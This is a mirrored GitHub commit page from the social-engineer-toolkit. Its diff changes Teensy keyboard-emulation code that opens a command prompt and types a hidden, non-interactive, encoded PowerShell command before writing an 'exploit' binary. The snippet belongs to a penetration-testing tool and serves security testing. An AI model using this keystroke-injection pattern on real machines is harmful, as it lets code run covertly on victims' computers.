mirror of
https://github.com/trustedsec/social-engineer-toolkit
synced 2025-03-04 15:27:19 +00:00
Slimmed the teensy powershell code
This commit is contained in:
parent
b01a086870
commit
0ec8e0b9ac
1 changed files with 1 additions and 1 deletions
|
@ -71,7 +71,7 @@ void loop()
|
|||
delay(5000);
|
||||
CommandAtRunBar("cmd");
|
||||
delay(750);
|
||||
Keyboard.print("powershell -noprofile -windowstyle hidden -noninteractive -EncodedCommand ");
|
||||
Keyboard.print("powershell -nop -win hidden -noni -enc ");
|
||||
// Write the binary to the notepad file
|
||||
int i;
|
||||
for (i = 0; i < sizeof(exploit)/sizeof(int); i++) {
|
||||
|
|
Loading…
Add table
Reference in a new issue